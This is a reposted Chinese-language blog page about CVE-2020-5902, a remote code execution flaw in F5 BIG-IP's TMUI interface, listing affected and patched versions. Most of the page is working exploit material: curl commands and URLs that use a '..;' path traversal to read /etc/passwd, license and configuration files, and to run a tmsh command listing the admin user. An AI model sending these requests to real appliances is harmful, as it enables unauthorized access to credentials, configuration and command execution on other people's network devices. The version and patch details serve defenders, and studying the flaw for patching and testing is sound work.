碼上快樂

相關內容    簡體    繁體

cve-2020-5902 BIG-IP RCE漏洞復現&exp

本文轉載自   查看原文   2020-07-06 09:52   5588    cve漏洞通告

簡介

BIG-IP的TMUI存在RCE漏洞

影響范圍

版本號主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

修復方法

升級
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

文件讀取poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

參考

  1. https://twitter.com/x4ce/status/1279760648465870848


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 F5 BIG-IP 遠程代碼執行RCE(CVE-2020-5902)環境搭建及復現 CVE-2020-5902:F5 BIG-IP 遠程代碼執行漏洞復現 F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902) CVE-2020-5902 F5 BIG-IP 遠程代碼執行漏洞復現 CVE-2020-5902 F5 BIG-IP 遠程代碼執行漏洞復現 CVE-2020-5902 簡單復現 cve-2020-5902 RCE的payload以及繞過方式 CVE-2020-0796 漏洞復現(rce)含exp教程 (CVE-2021-22986) BIG-IP 未授權遠程代碼執行漏洞復現 CVE-2020-0796漏洞復現(RCE)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM